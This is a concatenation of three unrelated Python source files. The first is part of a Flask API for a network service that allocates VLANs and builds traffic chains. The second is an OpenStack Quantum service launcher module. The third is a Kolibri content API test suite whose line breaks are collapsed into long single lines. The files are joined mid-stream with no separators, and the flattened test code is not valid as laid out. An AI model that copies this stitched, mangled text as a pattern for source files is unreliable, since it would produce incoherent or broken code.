        pe_ce_nfvi_ids = service_request['service']['pe_ce']
        allocated = service.post(client_mkt_id, ns_instance_id, nap_id,
                                 ce_pe_nfvi_ids, pe_ce_nfvi_ids)
    except KeyError as ex:
        # A mandatory field is missing from the JSON body.
        logger.error('Request to create service failed: must include {}'
                     .format(str(ex)))
        return jsonify({'error': 'Request must include {:s}'.
                        format(str(ex))}), 400
    except AttributeError:
        logger.error('Request to create service failed: Bad value for '
                     'nap_mkt_id or nfvi_mkt_id')
        return jsonify({'error': 'Bad value for nap_mkt_id or nfvi_mkt_id'}),\
            400
    except IndexError:
        # service.post ran out of VLANs to allocate.
        logger.error('Request to create service failed: No Vlans!')
        return jsonify({'error': 'No vlans available'}), 500
    except IntegrityError:
        # NOTE(review): adjacent string literals glue without a space in the
        # log message; kept verbatim.
        logger.error('Request to create service failed:'
                     'ns_instance_id {} already in use!'.format(ns_instance_id))
        return jsonify({'error': 'ns_instance_id "{}" already in use!'
                        .format(ns_instance_id)}), 400
    # Build the response payload (and a flat log line) from the allocation.
    log_string = ''
    result = {'allocated': {
        'ns_instance_id': ns_instance_id,
        'ce_pe': [],
        'pe_ce': [],
    }}
    log_string += 'ce_pe: '
    for hop in allocated['ce_pe']:
        log_string += 'nfvi_id: "{}" vlan_id: "{}"'.\
            format(hop['nfvi_mkt_id'], hop['vlan_id'])
        result['allocated']['ce_pe'].append({
            'nfvi_id': hop['nfvi_mkt_id'],
            'transport': {
                'type': 'vlan',
                'vlan_id': hop['vlan_id'],
            }})
    log_string += 'pe_ce: '
    for hop in allocated['pe_ce']:
        log_string += 'nfvi_id: "{}" vlan_id: "{}"'.\
            format(hop['nfvi_mkt_id'], hop['vlan_id'])
        result['allocated']['pe_ce'].append({
            'nfvi_id': hop['nfvi_mkt_id'],
            'transport': {
                'type': 'vlan',
                'vlan_id': hop['vlan_id'],
            }})
    logger.info('Allocated vlans\n{}\n'.format(log_string))
    return jsonify(result), 201


@app.route('/vnf-connectivity', methods=['GET'], strict_slashes=False)
@app.route('/vnf-connectivity/<string:ns_instance_id>', methods=['GET'],
           strict_slashes=False)
def service_request_get(ns_instance_id=None):
    """Fetch one service (by ``ns_instance_id``) or list them all."""
    logger.info('Request to get Service: {}'.format('id -> {}'.format(
        ns_instance_id) if ns_instance_id else 'All Services'))
    return jsonify({'services': service.get(ns_instance_id)}), 200


@app.route('/vnf-connectivity/<string:ns_instance_id>', methods=['PUT'],
           strict_slashes=False)
def service_request_put(ns_instance_id=None):
    """Enable an ALLOCATED service by installing its VTN traffic chain."""
    try:
        logger.info('Request enable Service: {}'.format(ns_instance_id))
        # [0] raises when the service does not exist; handled below.
        service_info = service.get(ns_instance_id)[0]
    except Exception:
        logger.error('Request enable Service {} failed : Service not found'
                     .format(ns_instance_id))
        return jsonify({'error': 'Service {} not found!'
                        .format(ns_instance_id)}), 400
    if service_info['status'] != 'ALLOCATED':
        logger.error(('Request enable Service {} failed : Service '
                      'not in ALLOCATED state').format(ns_instance_id))
        return jsonify({'error': 'Service {} is not in ALLOCATED state!'
                        .format(ns_instance_id)}), 400
    try:
        # Resolve every hop into a (switch, port, vlan_id) tuple.
        ce_pe = []
        for hop in service_info['ce_pe']:
            nfvi_info = nfvi.get(hop['nfvi_mkt_id'])[0]
            ce_pe.append(((nfvi_info['switch'], nfvi_info['port'],
                           hop['transport']['vlan_id'])))
        pe_ce = []
        for hop in service_info['pe_ce']:
            nfvi_info = nfvi.get(hop['nfvi_mkt_id'])[0]
            pe_ce.append(((nfvi_info['switch'], nfvi_info['port'],
                           hop['transport']['vlan_id'])))
        vtn.chain_create(service_info['client_mkt_id'],
                         service_info['ns_instance_id'],
                         service_info['nap_mkt_id'], ce_pe, pe_ce)
    except Exception as ex:
        logger.error('Request enable Service {} failed VTN Manager: {}'
                     .format(ns_instance_id, ex))
        return jsonify({'error': 'Unable to put redirection in place!'}), 500
    logger.info('Service: {} enabled!'.format(ns_instance_id))
    service.set_status(ns_instance_id, 'ACTIVE')
    return jsonify({'activated': {'ns_instance_id': ns_instance_id}}), 201


@app.route('/vnf-connectivity/<string:ns_instance_id>', methods=['DELETE'],
           strict_slashes=False)
def service_request_delete(ns_instance_id=None):
    """Tear down a service, removing its VTN chain first when ACTIVE."""
    try:
        logger.info('Request delete Service: {}'.format(ns_instance_id))
        service_info = service.get(ns_instance_id)[0]
    except Exception:
        logger.error('Request delete Service {} failed : Service not found'
                     .format(ns_instance_id))
        return jsonify({'error': 'Service {} not found!'
                        .format(ns_instance_id)}), 400
    if service_info['status'] not in ['ALLOCATED', 'ACTIVE']:
        # NOTE(review): adjacent string literals glue without a space in the
        # log message; kept verbatim.
        logger.error(('Request delete Service {} failed : Service'
                      'not in deletable state').format(ns_instance_id))
        return jsonify({'error': 'Service {} is not in deletable state!'
                        .format(ns_instance_id)}), 400
    service.set_status(ns_instance_id, 'TERMINATING')
    # Only ACTIVE services have a VTN chain to remove.
    if service_info['status'] == 'ACTIVE':
        vtn.chain_delete(service_info['client_mkt_id'], ns_instance_id,
                         service_info['nap_mkt_id'])
    service.delete_service(ns_instance_id)
    logger.info('Service: {} deleted!'.format(ns_instance_id))
    return jsonify({'deleted': {'ns_instance_id': ns_instance_id}}), 200


@app.route('/reset_db', methods=['DELETE'])
def reset_db():
    """Drop and recreate all tables. Destructive — test/dev use only."""
    logger.info('Request to delete the database!')
    db.drop_all()
    db.create_all()
    return 'ok', 200


@app.route("/")
def hello():
    """Liveness probe / landing endpoint."""
    logger.info('ola!')
    return "WICM!!"
# vim: tabstop=4 shiftwidth=4 softtabstop=4

# Copyright 2011 Nicira Networks, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

# Quantum service launchers: a WSGI wrapper for the API server and an
# RPC-based Service for agents/plugins with periodic tasks.

import inspect
import logging as std_logging
import os
import random

from oslo.config import cfg

from quantum.common import config
from quantum import context
from quantum.openstack.common import importutils
from quantum.openstack.common import log as logging
from quantum.openstack.common import loopingcall
from quantum.openstack.common.rpc import service
from quantum import wsgi

LOG = logging.getLogger(__name__)

# Tunables for the periodic-task scheduler.
# NOTE(review): `_` is assumed to be the gettext builtin installed elsewhere
# in the project — confirm.
service_opts = [
    cfg.IntOpt('periodic_interval',
               default=40,
               help=_('Seconds between running periodic tasks')),
    cfg.IntOpt('periodic_fuzzy_delay',
               default=5,
               help=_('range of seconds to randomly delay when starting the'
                      ' periodic task scheduler to reduce stampeding.'
                      ' (Disable by setting to 0)')),
]
CONF = cfg.CONF
CONF.register_opts(service_opts)
# NOTE(review): LOG is assigned twice in the original; kept verbatim.
LOG = logging.getLogger(__name__)


class WsgiService(object):
    """Base class for WSGI based services.

    For each api you define, you must also define these flags:
    :<api>_listen: The address on which to listen
    :<api>_listen_port: The port on which to listen
    """

    def __init__(self, app_name):
        # app_name: paste-deploy application name to load in start().
        self.app_name = app_name
        self.wsgi_app = None

    def start(self):
        # Build and start the WSGI server for this app.
        self.wsgi_app = _run_wsgi(self.app_name)

    def wait(self):
        # Block until the underlying server finishes.
        self.wsgi_app.wait()


class QuantumApiService(WsgiService):
    """Class for quantum-api service."""

    @classmethod
    def create(cls):
        """Alternate constructor that also configures logging."""
        app_name = "quantum"

        # Setup logging early, supplying both the CLI options and the
        # configuration mapping from the config file
        # We only update the conf dict for the verbose and debug
        # flags. Everything else must be set up in the conf file...
        # Log the options used when starting if we're in debug mode...

        config.setup_logging(cfg.CONF)
        # Dump the initial option values
        cfg.CONF.log_opt_values(LOG, std_logging.DEBUG)
        service = cls(app_name)
        return service


def serve_wsgi(cls):
    """Instantiate `cls` via its create() factory and start it."""
    try:
        service = cls.create()
    except Exception:
        LOG.exception(_('In WsgiService.create()'))
        raise

    service.start()

    return service


def _run_wsgi(app_name):
    """Load the paste app and start a WSGI server for it.

    Returns the started server, or None when no app is configured.
    """
    app = config.load_paste_app(app_name)
    if not app:
        LOG.error(_('No known API applications configured.'))
        return
    server = wsgi.Server("Quantum")
    server.start(app, cfg.CONF.bind_port, cfg.CONF.bind_host)
    # Dump all option values here after all options are parsed
    cfg.CONF.log_opt_values(LOG, std_logging.DEBUG)
    LOG.info(_("Quantum service started, listening on %(host)s:%(port)s"),
             {'host': cfg.CONF.bind_host, 'port': cfg.CONF.bind_port})
    return server


class Service(service.Service):
    """Service object for binaries running on hosts.

    A service takes a manager and enables rpc by listening to queues based
    on topic. It also periodically runs tasks on the manager.
    """

    def __init__(self, host, binary, topic, manager, report_interval=None,
                 periodic_interval=None, periodic_fuzzy_delay=None,
                 *args, **kwargs):
        # manager is given as a dotted-path string and imported here.
        self.binary = binary
        self.manager_class_name = manager
        manager_class = importutils.import_class(self.manager_class_name)
        self.manager = manager_class(host=host, *args, **kwargs)
        self.report_interval = report_interval
        self.periodic_interval = periodic_interval
        self.periodic_fuzzy_delay = periodic_fuzzy_delay
        # Saved so the service could be re-created with the same arguments.
        self.saved_args, self.saved_kwargs = args, kwargs
        self.timers = []
        super(Service, self).__init__(host, topic, manager=self.manager)

    def start(self):
        """Start RPC consumption plus the report/periodic timer loops."""
        self.manager.init_host()
        super(Service, self).start()
        if self.report_interval:
            pulse = loopingcall.LoopingCall(self.report_state)
            pulse.start(interval=self.report_interval,
                        initial_delay=self.report_interval)
            self.timers.append(pulse)

        if self.periodic_interval:
            if self.periodic_fuzzy_delay:
                # Random stagger so many services don't fire simultaneously.
                initial_delay = random.randint(0, self.periodic_fuzzy_delay)
            else:
                initial_delay = None

            periodic = loopingcall.LoopingCall(self.periodic_tasks)
            periodic.start(interval=self.periodic_interval,
                           initial_delay=initial_delay)
            self.timers.append(periodic)
        self.manager.after_start()

    def __getattr__(self, key):
        # Delegate unknown attributes to the manager (proxy pattern).
        manager = self.__dict__.get('manager', None)
        return getattr(manager, key)

    @classmethod
    def create(cls, host=None, binary=None, topic=None, manager=None,
               report_interval=None, periodic_interval=None,
               periodic_fuzzy_delay=None):
        """Instantiates class and passes back application object.

        :param host: defaults to CONF.host
        :param binary: defaults to basename of executable
        :param topic: defaults to bin_name - 'nova-' part
        :param manager: defaults to CONF.<topic>_manager
        :param report_interval: defaults to CONF.report_interval
        :param periodic_interval: defaults to CONF.periodic_interval
        :param periodic_fuzzy_delay: defaults to CONF.periodic_fuzzy_delay
        """
        if not host:
            host = CONF.host
        if not binary:
            # Derive the binary name from the outermost stack frame's file.
            binary = os.path.basename(inspect.stack()[-1][1])
        if not topic:
            topic = binary.rpartition('quantum-')[2]
            topic = topic.replace("-", "_")
        if not manager:
            manager = CONF.get('%s_manager' % topic, None)
        if report_interval is None:
            report_interval = CONF.report_interval
        if periodic_interval is None:
            periodic_interval = CONF.periodic_interval
        if periodic_fuzzy_delay is None:
            periodic_fuzzy_delay = CONF.periodic_fuzzy_delay
        service_obj = cls(host, binary, topic, manager,
                          report_interval=report_interval,
                          periodic_interval=periodic_interval,
                          periodic_fuzzy_delay=periodic_fuzzy_delay)

        return service_obj

    def kill(self):
        """Destroy the service object."""
        self.stop()

    def stop(self):
        """Stop RPC consumption and every running timer loop."""
        super(Service, self).stop()
        for x in self.timers:
            try:
                x.stop()
            except Exception:
                LOG.exception(_("Exception occurs when timer stops"))
                pass
        self.timers = []

    def wait(self):
        """Wait for RPC consumption and the timer loops to finish."""
        super(Service, self).wait()
        for x in self.timers:
            try:
                x.wait()
            except Exception:
                LOG.exception(_("Exception occurs when waiting for timer"))
                pass

    def periodic_tasks(self, raise_on_error=False):
        """Tasks to be run at a periodic interval."""
        ctxt = context.get_admin_context()
        self.manager.periodic_tasks(ctxt, raise_on_error=raise_on_error)

    def report_state(self):
        """Update the state of this service."""
        # Todo(gongysh) report state to quantum server
        pass
""" To run this test, type this in command line <kolibri manage test -- kolibri.content> """ import datetime import uuid from collections import namedtuple import mock import requests from django.core.cache import cache from django.core.urlresolvers import reverse from django.db.models import Q from django.utils import timezone from le_utils.constants import content_kinds from rest_framework import status from rest_framework.test import APITestCase import kolibri.content.serializers from kolibri.auth.models import Facility from kolibri.auth.models import FacilityUser from kolibri.auth.test.helpers import provision_device from kolibri.content import models as content from kolibri.core.device.models import DevicePermissions from kolibri.core.device.models import DeviceSettings from kolibri.core.exams.models import Exam from kolibri.core.lessons.models import Lesson from kolibri.logger.models import ContentSessionLog from kolibri.logger.models import ContentSummaryLog DUMMY_PASSWORD = "password" class ContentNodeTestBase(object): """ Basecase for content metadata methods """ def test_get_prerequisites_for(self): """ test the directional characteristic of prerequisite relationship """ c1 = content.ContentNode.objects.get(title="c1") root = content.ContentNode.objects.get(title="root") # if root is the prerequisite of c1 expected_output = content.ContentNode.objects.filter(title__in=["root"]) actual_output = content.ContentNode.objects.filter(prerequisite_for=c1) self.assertEqual(set(expected_output), set(actual_output)) # then c1 should not be the prerequisite of root unexpected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = content.ContentNode.objects.filter(prerequisite_for=root) self.assertNotEqual(set(actual_output), set(unexpected_output)) def test_get_has_prerequisites(self): """ test the directional characteristic of prerequisite relationship """ c1 = content.ContentNode.objects.get(title="c1") root = 
content.ContentNode.objects.get(title="root") # if root is the prerequisite of c1 expected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = content.ContentNode.objects.filter(has_prerequisite=root) self.assertEqual(set(expected_output), set(actual_output)) # then c1 should not be the prerequisite of root unexpected_output = content.ContentNode.objects.filter(title__in=["root"]) actual_output = content.ContentNode.objects.filter(has_prerequisite=c1) self.assertNotEqual(set(actual_output), set(unexpected_output)) def test_get_all_related(self): """ test the nondirectional characteristic of related relationship """ c1 = content.ContentNode.objects.get(title="c1") c2 = content.ContentNode.objects.get(title="c2") # if c1 is related to c2 expected_output = content.ContentNode.objects.filter(title__in=["c2"]) actual_output = content.ContentNode.objects.filter(related=c1) self.assertEqual(set(expected_output), set(actual_output)) # then c2 should be related to c1 expected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = content.ContentNode.objects.filter(related=c2) self.assertEqual(set(expected_output), set(actual_output)) def test_descendants_of_kind(self): p = content.ContentNode.objects.get(title="root") expected_output = content.ContentNode.objects.filter(title__in=["c1"]) actual_output = p.get_descendants(include_self=False).filter(kind=content_kinds.VIDEO) self.assertEqual(set(expected_output), set(actual_output)) def test_get_top_level_topics(self): p = content.ContentNode.objects.get(title="root") expected_output = content.ContentNode.objects.filter(parent=p, kind=content_kinds.TOPIC) actual_output = content.ContentNode.objects.get(title="root").get_children().filter(kind=content_kinds.TOPIC) self.assertEqual(set(expected_output), set(actual_output)) def test_tag_str(self): # test for ContentTag __str__ p = content.ContentTag.objects.get(tag_name="tag_2") self.assertEqual(str(p), 'tag_2') def 
test_lang_str(self): # test for Language __str__ p = content.Language.objects.get(lang_code="en") self.assertEqual(str(p), 'English-Test') def test_channelmetadata_str(self): # test for ChannelMetadata __str__ p = content.ChannelMetadata.objects.get(name="testing") self.assertEqual(str(p), 'testing') def test_tags(self): root_tag_count = content.ContentNode.objects.get(title='root').tags.count() self.assertEqual(root_tag_count, 3) c1_tag_count = content.ContentNode.objects.get(title='c1').tags.count() self.assertEqual(c1_tag_count, 1) c2_tag_count = content.ContentNode.objects.get(title='c2').tags.count() self.assertEqual(c2_tag_count, 1) c2c1_tag_count = content.ContentNode.objects.get(title='c2c1').tags.count() self.assertEqual(c2c1_tag_count, 0) def test_local_files(self): self.assertTrue(content.LocalFile.objects.filter(id='9f9438fe6b0d42dd8e913d7d04cfb2b2').exists()) self.assertTrue(content.LocalFile.objects.filter(id='725257a0570044acbd59f8cf6a68b2be').exists()) self.assertTrue(content.LocalFile.objects.filter(id='e00699f859624e0f875ac6fe1e13d648').exists()) self.assertTrue(content.LocalFile.objects.filter(id='4c30dc7619f74f97ae2ccd4fffd09bf2').exists()) self.assertTrue(content.LocalFile.objects.filter(id='8ad3fffedf144cba9492e16daec1e39a').exists()) def test_delete_tree(self): channel = content.ChannelMetadata.objects.first() channel_id = channel.id channel.delete_content_tree_and_files() self.assertFalse(content.ContentNode.objects.filter(channel_id=channel_id).exists()) self.assertFalse(content.File.objects.all().exists()) class ContentNodeAPITestCase(APITestCase): """ Testcase for content API methods """ fixtures = ['content_test.json'] the_channel_id = '6199dde695db4ee4ab392222d5af1e5c' def setUp(self): provision_device() self.facility = Facility.objects.create(name='facility') self.admin = FacilityUser.objects.create(username='admin', facility=self.facility) self.admin.set_password(DUMMY_PASSWORD) self.admin.save() self.facility.add_admin(self.admin) 
def _reverse_channel_url(self, pattern_name, kwargs={}): """Helper method to reverse a URL using the current channel ID""" return reverse(pattern_name, kwargs=kwargs) def test_prerequisite_for_filter(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"prerequisite_for": c1_id}) self.assertEqual(response.data[0]['title'], 'root') def test_has_prerequisite_filter(self): root_id = content.ContentNode.objects.get(title="root").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"has_prerequisite": root_id}) self.assertEqual(response.data[0]['title'], 'c1') def test_related_filter(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"related": c1_id}) self.assertEqual(response.data[0]['title'], 'c2') def test_contentnode_list(self): root = content.ContentNode.objects.get(title="root") expected_output = root.get_descendants(include_self=True).filter(available=True).count() response = self.client.get(self._reverse_channel_url("contentnode-list")) self.assertEqual(len(response.data), expected_output) def test_contentnode_granular_network_import(self): c1_id = content.ContentNode.objects.get(title="root").id c2_id = content.ContentNode.objects.get(title="c1").id c3_id = content.ContentNode.objects.get(title="c2").id content.ContentNode.objects.all().update(available=False) response = self.client.get(reverse("contentnode_granular-detail", kwargs={"pk": c1_id})) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "root", "kind": "topic", "available": False, "total_resources": 1, "on_device_resources": 0, "coach_content": False, "importable": True, "num_coach_contents": 0, "children": [ { "pk": c2_id, "id": c2_id, "title": "c1", "kind": "video", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": True, "coach_content": 
False, "num_coach_contents": 0, }, { "pk": c3_id, "id": c3_id, "title": "c2", "kind": "topic", "available": False, "total_resources": 0, "on_device_resources": 0, "importable": True, "coach_content": False, "num_coach_contents": 0, } ] } ) @mock.patch('kolibri.content.serializers.get_mounted_drives_with_channel_info') def test_contentnode_granular_local_import(self, drive_mock): DriveData = namedtuple("DriveData", ["id", "datafolder"]) drive_mock.return_value = {"123": DriveData(id="123", datafolder="test/")} content.LocalFile.objects.update(available=False) content.ContentNode.objects.update(available=False) c1_id = content.ContentNode.objects.get(title="root").id c2_id = content.ContentNode.objects.get(title="c1").id c3_id = content.ContentNode.objects.get(title="c2").id response = self.client.get( reverse("contentnode_granular-detail", kwargs={"pk": c1_id}), {"importing_from_drive_id": "123"}) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "root", "kind": "topic", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": True, "coach_content": False, "num_coach_contents": 0, "children": [ { "pk": c2_id, "id": c2_id, "title": "c1", "kind": "video", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": False, "coach_content": False, "num_coach_contents": 0, }, { "pk": c3_id, "id": c3_id, "title": "c2", "kind": "topic", "available": False, "total_resources": 0, "on_device_resources": 0, "importable": True, "coach_content": False, "num_coach_contents": 0, } ] } ) def test_contentnode_granular_export_available(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(reverse("contentnode_granular-detail", kwargs={"pk": c1_id})) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "c1", "kind": "video", "available": True, "total_resources": 1, "on_device_resources": 1, "importable": True, "children": [], "coach_content": False, 
"num_coach_contents": 0, } ) def test_contentnode_granular_export_unavailable(self): c1_id = content.ContentNode.objects.get(title="c1").id content.ContentNode.objects.filter(title="c1").update(available=False) response = self.client.get(reverse("contentnode_granular-detail", kwargs={"pk": c1_id})) self.assertEqual( response.data, { "pk": c1_id, "id": c1_id, "title": "c1", "kind": "video", "available": False, "total_resources": 1, "on_device_resources": 0, "importable": True, "children": [], "coach_content": False, "num_coach_contents": 0, } ) def test_contentnodefilesize_resourcenode(self): c1_id = content.ContentNode.objects.get(title="c1").id content.LocalFile.objects.filter(pk="6bdfea4a01830fdd4a585181c0b8068c").update(file_size=2) content.LocalFile.objects.filter(pk="211523265f53825b82f70ba19218a02e").update(file_size=1, available=False) response = self.client.get(reverse("contentnodefilesize-detail", kwargs={"pk": c1_id})) self.assertEqual(response.data, {"total_file_size": 3, "on_device_file_size": 2}) def test_contentnodefilesize_topicnode(self): root_id = content.ContentNode.objects.get(title="root").id content.LocalFile.objects.filter(pk="6bdfea4a01830fdd4a585181c0b8068c").update(file_size=2) content.LocalFile.objects.filter(pk="211523265f53825b82f70ba19218a02e").update(file_size=1, available=False) content.LocalFile.objects.filter(pk="e00699f859624e0f875ac6fe1e13d648").update(file_size=3) response = self.client.get(reverse("contentnodefilesize-detail", kwargs={"pk": root_id})) self.assertEqual(response.data, {"total_file_size": 6, "on_device_file_size": 2}) def test_contentnode_retrieve(self): c1_id = content.ContentNode.objects.get(title="c1").id response = self.client.get(self._reverse_channel_url("contentnode-detail", {'pk': c1_id})) self.assertEqual(response.data['pk'], c1_id.__str__()) def test_contentnode_field_filtering(self): c1_id = content.ContentNode.objects.get(title="c1").id response = 
self.client.get(self._reverse_channel_url("contentnode-detail", {'pk': c1_id}), data={"fields": "title,description"}) self.assertEqual(response.data['title'], "c1") self.assertEqual(response.data['description'], "balbla2") self.assertTrue("pk" not in response.data) def test_contentnode_recommendations(self): id = content.ContentNode.objects.get(title="c2c2").id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"recommendations_for": id}) self.assertEqual(len(response.data), 2) def test_contentnode_recommendations_does_not_error_for_unavailable_node(self): node = content.ContentNode.objects.get(title="c2c2") node.available = False node.save() id = node.id response = self.client.get(self._reverse_channel_url("contentnode-list"), data={"recommendations_for": id}) self.assertEqual(len(response.data), 2) def test_contentnode_allcontent(self): nodes = content.ContentNode.objects.exclude(kind=content_kinds.TOPIC).filter(available=True).count() response = self.client.get(self._reverse_channel_url("contentnode-all-content")) self.assertEqual(len(response.data), nodes) def test_channelmetadata_list(self): response = self.client.get(reverse("channel-list", kwargs={})) self.assertEqual(response.data[0]['name'], 'testing') def test_channelmetadata_retrieve(self): data = content.ChannelMetadata.objects.values()[0] response = self.client.get(reverse("channel-detail", kwargs={'pk': data["id"]})) self.assertEqual(response.data['name'], 'testing') def test_channelmetadata_resource_info(self): data = content.ChannelMetadata.objects.values()[0] c1_id = content.ContentNode.objects.get(title="c1").id content.ContentNode.objects.filter(pk=c1_id).update(available=False) get_params = {'include_fields': 'total_resources,total_file_size,on_device_resources,on_device_file_size'} response = self.client.get(reverse("channel-detail", kwargs={'pk': data["id"]}), get_params) self.assertEqual(response.data['total_resources'], 1) 
self.assertEqual(response.data['total_file_size'], 0) self.assertEqual(response.data['on_device_resources'], 4) self.assertEqual(response.data['on_device_file_size'], 0) def test_channelmetadata_langfield(self): data = content.ChannelMetadata.objects.first() root_lang = content.Language.objects.get(pk=1) data.root.lang = root_lang data.root.save() response = self.client.get(self._reverse_channel_url("channel-detail", {'pk': data.id})) self.assertEqual(response.data['lang_code'], root_lang.lang_code) self.assertEqual(response.data['lang_name'], root_lang.lang_name) def test_channelmetadata_langfield_none(self): data = content.ChannelMetadata.objects.first() response = self.client.get(self._reverse_channel_url("channel-detail", {'pk': data.id})) self.assertEqual(response.data['lang_code'], None) self.assertEqual(response.data['lang_name'], None) def test_channelmetadata_content_available_param_filter_lowercase_true(self): response = self.client.get(reverse("channel-list"), {"available": "true"}) self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c") def test_channelmetadata_content_available_param_filter_uppercase_true(self): response = self.client.get(reverse("channel-list"), {"available": True}) self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c") def test_channelmetadata_content_unavailable_param_filter_false(self): content.ContentNode.objects.filter(title="root").update(available=False) response = self.client.get(reverse("channel-list"), {"available": False}) self.assertEqual(response.data[0]["id"], "6199dde695db4ee4ab392222d5af1e5c") def test_channelmetadata_content_available_field_true(self): response = self.client.get(reverse("channel-list")) self.assertEqual(response.data[0]["available"], True) def test_channelmetadata_content_available_field_false(self): content.ContentNode.objects.filter(title="root").update(available=False) response = self.client.get(reverse("channel-list")) 
self.assertEqual(response.data[0]["available"], False) def test_channelmetadata_include_fields_filter_has_total_resources(self): response = self.client.get(reverse("channel-list"), {'include_fields': 'total_resources'}) self.assertEqual(response.data[0]["total_resources"], 1) def test_channelmetadata_include_fields_filter_has_total_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(file_size=1) response = self.client.get(reverse("channel-list"), {'include_fields': 'total_file_size'}) self.assertEqual(response.data[0]["total_file_size"], 2) def test_channelmetadata_include_fields_filter_has_on_device_resources(self): response = self.client.get(reverse("channel-list"), {'include_fields': 'on_device_resources'}) self.assertEqual(response.data[0]["on_device_resources"], 5) def test_channelmetadata_include_fields_filter_has_on_device_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(file_size=1) response = self.client.get(reverse("channel-list"), {'include_fields': 'on_device_file_size'}) self.assertEqual(response.data[0]["on_device_file_size"], 4) def test_channelmetadata_include_fields_filter_has_no_on_device_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(available=True) response = self.client.get(reverse("channel-list"), {'include_fields': 'total_resources,total_file_size,on_device_resources,on_device_file_size'}) self.assertEqual(response.data[0]["on_device_file_size"], 0) @mock.patch.object(kolibri.content.serializers, 'renderable_contentnodes_without_topics_q_filter', Q(kind="dummy")) def test_channelmetadata_include_fields_filter_has_no_renderable_on_device_file_size(self): content.LocalFile.objects.filter(files__contentnode__channel_id=self.the_channel_id).update(file_size=1) response = self.client.get(reverse("channel-list"), {'include_fields': 'on_device_file_size'}) 
        # Tail of a test method whose `def` appears above this chunk:
        # verifies the reported on-device file size for the first channel.
        self.assertEqual(response.data[0]["on_device_file_size"], 4)

    def test_channelmetadata_has_exercises_filter(self):
        # Has nothing else for that matter...
        # Create a second channel containing only a bare topic node, so the
        # `has_exercise` filter has something to exclude.
        no_exercise_channel = content.ContentNode.objects.create(
            pk="6a406ac66b224106aa2e93f73a94333d",
            channel_id="f8ec4a5d14cd4716890999da596032d2",
            content_id="ded4a083e75f4689b386fd2b706e792a",
            kind="topic",
            title="no exercise channel",
        )
        content.ChannelMetadata.objects.create(
            id="63acff41781543828861ade41dbdd7ff",
            name="no exercise channel metadata",
            root=no_exercise_channel,
        )
        # Without the filter both channels are listed.
        no_filter_response = self.client.get(reverse("channel-list"))
        self.assertEqual(len(no_filter_response.data), 2)
        # With the filter only the fixture channel (which has exercises) remains.
        with_filter_response = self.client.get(reverse("channel-list"), {"has_exercise": True})
        self.assertEqual(len(with_filter_response.data), 1)
        # NOTE(review): "testing" is presumably the fixture channel's name — confirm against the fixture.
        self.assertEqual(no_filter_response.data[0]["name"], "testing")

    def test_file_list(self):
        response = self.client.get(self._reverse_channel_url("file-list"))
        # fixture-derived count — see the test fixture for the 5 File objects
        self.assertEqual(len(response.data), 5)

    def test_file_retrieve(self):
        response = self.client.get(self._reverse_channel_url("file-detail", {'pk': "6bdfea4a01830fdd4a585181c0b8068c"}))
        self.assertEqual(response.data['preset'], 'High Resolution')

    def _setup_contentnode_progress(self):
        # set up data for testing progress_fraction field on content node endpoint
        facility = Facility.objects.create(name="MyFac")
        user = FacilityUser.objects.create(username="learner", facility=facility)
        user.set_password("pass")
        user.save()
        root = content.ContentNode.objects.get(title="root")
        c1 = content.ContentNode.objects.get(title="c1")
        c2 = content.ContentNode.objects.get(title="c2")
        c2c1 = content.ContentNode.objects.get(title="c2c1")
        c2c3 = content.ContentNode.objects.get(title="c2c3")
        # Record partial progress on two leaf nodes for the learner.
        for node, progress in [(c2c1, 0.7), (c2c3, 0.5)]:
            ContentSummaryLog.objects.create(
                user=user,
                content_id=node.content_id,
                progress=progress,
                channel_id=self.the_channel_id,
                start_timestamp=datetime.datetime.now()
            )
        return facility, root, c1, c2, c2c1, c2c3

    def test_contentnode_progress(self):
        facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress()

        def assert_progress(node, progress):
            # Fetch a single node and check its reported progress_fraction.
            response = self.client.get(self._reverse_channel_url("contentnode-detail", {'pk': node.id}))
            self.assertEqual(response.data["progress_fraction"], progress)

        # check that there is no progress when not logged in
        assert_progress(root, 0)
        assert_progress(c1, 0)
        assert_progress(c2, 0)
        assert_progress(c2c1, 0)

        # check that progress is calculated appropriately when user is logged in
        self.client.login(username="learner", password="pass", facility=facility)
        # Topic so None
        assert_progress(root, None)
        assert_progress(c1, None)
        # Topic so None
        assert_progress(c2, None)
        assert_progress(c2c1, 0.7)

    def test_contentnode_progress_detail_endpoint(self):
        facility, root, c1, c2, c2c1, c2c3 = self._setup_contentnode_progress()

        def assert_progress(node, progress):
            response = self.client.get(self._reverse_channel_url("contentnodeprogress-detail", {'pk': node.id}))
            self.assertEqual(response.data["progress_fraction"], progress)

        # check that there is no progress when not logged in
        assert_progress(root, 0)
        assert_progress(c1, 0)
        assert_progress(c2, 0)
        assert_progress(c2c1, 0)

        # check that progress is calculated appropriately when user is logged in
        self.client.login(username="learner", password="pass", facility=facility)

        # The progress endpoint is used, so should report progress for topics
        assert_progress(root, 0.24)
